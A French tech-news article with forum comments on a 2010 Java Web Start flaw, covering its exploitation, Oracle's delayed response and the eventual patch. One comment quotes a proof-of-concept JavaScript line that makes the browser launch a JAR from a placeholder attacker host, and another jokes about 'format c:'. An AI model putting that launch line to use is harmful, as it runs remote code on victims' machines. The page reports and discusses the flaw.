Vous êtes nouveau sur Developpez.com ? Créez votre compte ou connectez-vous afin de pouvoir participer !

Vous devez avoir un compte Developpez.com et être connecté pour pouvoir participer aux discussions.

Vous n'avez pas encore de compte Developpez.com ? Créez-en un en quelques instants, c'est entièrement gratuit !

Si vous disposez déjà d'un compte et qu'il est bien activé, connectez-vous à l'aide du formulaire ci-dessous.

Identifiez-vous
Identifiant
Mot de passe
Mot de passe oublié ?
Créer un compte

L'inscription est gratuite et ne vous prendra que quelques instants !

Je m'inscris !

La vulnérabilité de Java déjà exploitée
Depuis des serveurs russes

Le , par Gordon Fowler

0PARTAGES

0  0 
Mise à jour du 15/04/10
Oracle met à disposition une version correctrice du JRE/JDK : JDK 6 Update 20

Comme vient de le rapporter HowHigH, Oracle-Sun vient de patcher en urgence la vulnérabilité en sortant un correctif de sécurité
Les Release Notes
Téléchargez la dernière version du JRE/JDK 6

La vulnérabilité de Java déjà exploitée
Depuis des serveurs russes, Oracle reste sur sa position

La faille de Java récemment mise à jour par un ingénieur de Google (lire ci-avant) serait déjà exploitée.

Roger Thompson, chef chercheur chez AVG, a repéré des attaques depuis des serveurs russes utilisés par des sites qui ciblent le grand public (comme Songlyrics.com, qui propose les paroles de chansons de Lady Gaga, Rihanna, etc.).

En arrivant sur ce site, un iFrame malicieux camouflé dans une publicité redirige l'utilisateur (sans que celui-ci ne s'en aperçoive) vers un serveur hébergeant l'exploit.

Lors de sa visite, le payload (autrement dit la "charge active" de l'attaque : le code sensé se télécharger sur la machine) n'était pas activé. Roger Thompson suppose donc que toute cette attaque était un test grandeur nature.

"Le code impliqué [dans l'attaque] est très simple, ce qui le rend facile à reproduire, ce n'est donc pas surprenant que seulement cinq jours après [la découverte de la vulnérabilité de Java], nous détectons ce code dans une attaque qui utilise un serveur Russe" écrit-il sur son blog. Et d'appeler Sun a réagir au plus vite.

Malheureusement, Oracle-Sun a déjà indiqué qu'à ses yeux cette vulnérabilité n'était pas assez importante pour rompre son cycle de sortie de mises à jour de sécurité. La faille restera donc non-patchée jusqu'à juillet.

Pour mémoire, la vulnérabilité concerne Java Web Start, une fonctionnalité ajoutée depuis Java 6 qui permet aux développeurs de lancer plus facilement l'exécution de programmes depuis la machine de l'internaute. Une fonctionnalité à double tranchant (c'est en tout cas la présentation qu'en fait Thompson).

La crainte de beaucoup d'éditeurs de solution de sécurité est de voir arriver un nouveau "toolkits" sur les forums de hackers qui permette d'automatiser l'attaque sans que le pirate n'ait la moindre ligne de code à écrire.

Face aux accusations d'irresponsabilité qui se multiplient, Oracle reste silencieux (et sur sa position).

En attendant la réponse du nouveau propriétaire de Sun, les recommandations de Tavis Ormandy, l'ingénieur de Goggle qui a découvert la vulnérabilité de Java, restent bonnes à connaître (lire ci-avant).

Source : Le billet de Roger Thompson

Et vous ?

D'après vous, Oracle est-il "irresponsable" de ne pas sortir un patch en urgence, ou Roger Thompson et ses collègues donnent-ils dans le catastrophisme ?

MAJ de Gordon Fowler

Une faille de Java permettrait de prendre le contrôle d'une machine
Oracle minimise la vulnérabilité découverte par un ingénieur de Google

Un ingénieur de Google, Tavis Ormandy, vient de mettre à jour une faille de Java qui touche les versions Windows depuis la 6 update 10.

Après avoir contacté Oracle, Ormandy a reçu pour réponse que la société "ne considère pas cette vulnérabilité suffisamment importante pour rompre le cycle trimestriel de réalisation des patchs". Une appréciation avec laquelle "il n'est pas d'accord".

L'attaque que permet la faille est pourtant sérieuse puisqu'elle permet à un tiers de lancer un code malveillant et de prendre le contrôle de la machine.

En résumé, la vulnérabilité vient du fait que Java permet à un développeur d'installer une librairie alternative au lancement d'une JVM. Il suffit donc de créer une librairie "malveillante" et de l'appeler pour lancer un code à l'insu de l'utilisateur.

Selon Symantec, la faille toucherait également Linux - mais ne serait pas exploitable.

Plus d'informations sur la faille et sur les parades à adopter en attendant le patch d'Oracle dans le communiqué de Ormandy.

Source : Le communiqé de Tavis Ormandy et celle de Symantec

Lire aussi

Des vulnérabilités découvertes dans Java, déjà patchées par Oracle

Les rubriques (actus, forums, tutos) de Développez.com :
Java
Sécurité
Windows
Linux

Et vous ?

Cette vulnérabilité vous parait-elle critique ?
Et d'après vous, Oracle a-t-il raison de ne pas rompre son cycle de sortie de mises à jour de sécurité ?

Une erreur dans cette actualité ? Signalez-le nous !

Avatar de Paul TOTH
Expert éminent sénior https://www.developpez.com
Le 12/04/2010 à 17:32
dont la plus simple pour le grand public est encore de désinstaller Java
rolala !!! c'est un joli troll ça moi je propose

- format c:
- débrancher le câble réseau
0  0 
Avatar de Gordon Fowler
Expert éminent sénior https://www.developpez.com
Le 12/04/2010 à 17:41
Citation Envoyé par Paul TOTH Voir le message
rolala !!! c'est un joli troll ça moi je propose

- format c:
- débrancher le câble réseau
Té non ! Pas de troll !!
Je retire ce que j'ai dit. Voila c'est fait, j'ai rien dit...
0  0 
Avatar de gmotw
Membre confirmé https://www.developpez.com
Le 12/04/2010 à 17:52
De toute manière, il y a des méthodes plus simples indiqués sur le document.

Par contre, j'ai pas tout capté comment utiliser correctement cette faille, mais ça a l'air de passer par navigateur, c'est ça? Tu envoies vers un lien avec dedans "-jar tonJarTropIvol.jar".

Donc c'est bien le développeur qui fait son jar super-ivol-trop-méchant, et non pas un développeur qui utilise le jar d'un autre pour y rajouter une librairie pas-gentille-vilaine-bouh-pas-bien.
0  0 
Avatar de Gordon Fowler
Expert éminent sénior https://www.developpez.com
Le 12/04/2010 à 18:05
Citation Envoyé par gmotw Voir le message

Par contre, j'ai pas tout capté comment utiliser correctement cette faille, mais ça a l'air de passer par navigateur, c'est ça?
Salut,

T'as une démo (présentée comme sans risque ) ici de comment ça marche :
http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html
0  0 
Avatar de jaimepaslesmodozélés
Membre du Club https://www.developpez.com
Le 12/04/2010 à 21:10
Bof, comme d'habitude -dans sa config par défaut- cela nécessite l'approbation de l'utilisateur (regardez votre config de Java Web Start, vous verrez bien).
Second point, si le JAR invoqué de manière détournée s'avère être dangereux, alors votre super-antivirus le détectera, comme d'hab.
Le soucis est que l'on parle ici d'un individu sans antivirus (ou quelconque solution de sécurité) cliquant frénétiquement sur "Yes" et "Next".

Alors si demander à l'utilisateur s'il veut installer XXX est ce qu'on appelle une faille de sécurité, je tiens à rappeler la plus grande faille toujours pas colmatée et exploitée depuis des temps immémoriaux : la bêtise humaine & son appétence à manipuler sans chercher à comprendre.

Non vraiment, ça n'a rien de critique.

[edit] Ajoutons que les paramètres de sécurité par défaut de Vista & Seven préviennent efficacement de ce genre de manip ^^.
Rien à craindre donc.
0  0 
Avatar de pseudocode
Rédacteur https://www.developpez.com
Le 12/04/2010 à 23:32
+1

Accepter le lancement une appli WebStart, c'est déjà le début de la fin de la sécurité. C'est un peu l'équivalent de lancer un exécutable reçu en piece-jointe d'un mail.
0  0 
Avatar de Patriarch24
Membre expérimenté https://www.developpez.com
Le 13/04/2010 à 9:17
Accepter le lancement une appli WebStart, c'est déjà le début de la fin de la sécurité.
Oui, mais il existe ce qu'on appelle des signatures numériques pour identifier les "applications de confiance". Ou alors, n'acceptons plus aucun certificat...

Quant à la faille, elle se situe probablement quelque part entre le clavier et la chaise.
0  0 
Avatar de gmotw
Membre confirmé https://www.developpez.com
Le 13/04/2010 à 9:18
Citation Envoyé par Gordon Fowler Voir le message
Salut,

T'as une démo (présentée comme sans risque ) ici de comment ça marche :
http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html
Duh, proxy.

Sinon sur le communiqué, il donne ça comme exemple:
var o = document.createElement("OBJECT";
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none";
Du coup, je voulais justement savoir pour les gens comme moi qui n'ont pas accès à l'autre document si c'était juste dans ce genre d'utilisation qu'il considérait la faille. (parce que du coup effectivement, c'est peut-être un peu moins catastrophique)
0  0 
Avatar de JoeChip
Membre éclairé https://www.developpez.com
Le 13/04/2010 à 9:22
Accepter le lancement une appli WebStart, c'est déjà le début de la fin de la sécurité.
Alors accepter d'installer une application, c'est le début de la fin de la sécurité... Pour avoir une sécurité absolue, il faut un ordi sans connexion au net, sans applications installée, et sans OS. Un ordinateur éteint, quoi.
0  0 
Avatar de Vincent M
Membre à l'essai https://www.developpez.com
Le 13/04/2010 à 9:24
La démo est bloquée par avast en tout cas.
Donc effectivement se balader à poil sur internet est une faille critique.
On ne patchera jamais l'utilisateur...

Je trouve que les annonces de failles "critique", c'est pratiquement de la désinformation, un peu comme quand l'état communique sur les "dangers" d'internet.

PS:
7 ans de lecture
4 mois d'inscription
1er Message... => Bonjour à tous
0  0